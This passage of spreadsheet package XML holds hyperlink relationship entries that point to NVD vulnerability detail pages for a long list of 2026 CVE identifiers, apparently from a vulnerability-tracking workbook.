TargetMode="External" Id="rId833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102879" TargetMode="External" Id="rId834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103053" TargetMode="External" Id="rId835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103057" TargetMode="External" Id="rId836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35189" TargetMode="External" Id="rId837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42772" TargetMode="External" Id="rId838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79417" TargetMode="External" Id="rId839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81869" TargetMode="External" Id="rId840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102269" TargetMode="External" Id="rId841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95292" TargetMode="External" Id="rId842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95300" TargetMode="External" Id="rId843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95358" TargetMode="External" Id="rId844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102312" TargetMode="External" Id="rId845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71974" TargetMode="External" Id="rId846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95340" TargetMode="External" Id="rId847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95342" TargetMode="External" Id="rId848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95361" TargetMode="External" Id="rId849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35191" TargetMode="External" Id="rId850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102279" TargetMode="External" Id="rId851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97711" TargetMode="External" Id="rId852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102842" TargetMode="External" Id="rId853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102847" TargetMode="External" Id="rId854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102877" TargetMode="External" Id="rId855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102771" TargetMode="External" Id="rId856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102844" TargetMode="External" Id="rId857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102912" TargetMode="External" Id="rId858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102621" TargetMode="External" Id="rId859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102601" TargetMode="External" Id="rId860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102820" TargetMode="External" Id="rId861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102821" TargetMode="External" Id="rId862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102822" TargetMode="External" Id="rId863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102823" TargetMode="External" Id="rId864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102824" TargetMode="External" Id="rId865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102825" TargetMode="External" Id="rId866" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet3.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76504" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102427" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55107" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76570" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96349" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100512" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102115" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18782" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55494" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82307" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88920" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96350" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97248" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97274" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102149" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102489" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102490" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14157" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55181" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93903" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102147" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102455" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102458" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103395" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103470" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103475" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74864" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76142" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82824" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82825" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82827" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82829" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96822" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101276" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101283" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102508" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102992" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103547" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19445" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74865" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102095" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102102" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102103" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102104" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102105" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102106" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62308" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75969" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77185" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87830" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89238" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92966" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94052" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94053" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97196" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55176" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94389" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100277" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13313" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100253" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100254" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101880" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101882" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102120" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102125" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102377" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103474" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18783" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80275" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94076" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94121" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94678" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94683" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95531" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96831" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96837" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96838" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97291" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102092" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102100" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102509" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102510" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102993" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102994" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102995" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102996" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102997" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102998" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102999" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103000" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103235" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103270" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103471" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10764" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47097" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55094" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55224" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76992" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82826" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82828" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92867" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92870" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92871" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102121" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102454" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103239" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103398" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97150" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102511" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10739" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94115" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94177" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97287" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97293" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76146" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103237" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103321" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46711" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100273" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102984" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102990" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93621" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96817" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100255" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102101" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102126" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103432" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103473" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51568" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51570" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87004" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93994" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 